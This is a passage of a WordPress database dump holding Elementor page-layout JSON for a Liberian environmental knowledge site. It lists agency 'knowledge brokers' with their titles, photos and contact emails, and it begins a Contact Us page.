\\/>bjallah@epa.gov.lr<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f9614d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/so.jpg\",\"id\":3324}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d88ffbf\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong>\\n<p>Manager, ESIA <\\/br>\\nDepartment of Compliance and Enforcement <\\/br>\\nEPA\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong>\\n<p>Marketing and Forest Forecast \\n<\\/br>\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong>\\n<p>Conservation Manager <\\/br> FDA <\\/br>\\n<a href=\\\"mailto:blamahg@gmail.com\\\">blamag@gmail.com<\\/a> <\\/br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><\\/p><p>Director, MOA<\\/p><p><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager, LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director, MOCI<br \\/>Division of Foreign Trade<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer, MOCI<br \\/>National Standard Laboratory<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards, MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer, MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager, NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>NaFAA<br \\/>Monitoring, Control, and Surveillance Field Officer <\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>NaFAA<br \\/>Small Scale Fisheries Officer<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector, LIMA<br \\/>Department of Marine Environmental Protection<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23411,3403,'_elementor_edit_mode','builder'),(23412,3403,'_elementor_template_type','wp-page'),(23413,3403,'_elementor_version','3.0.16'),(23414,3403,'_wp_page_template','default'),(23415,3403,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your 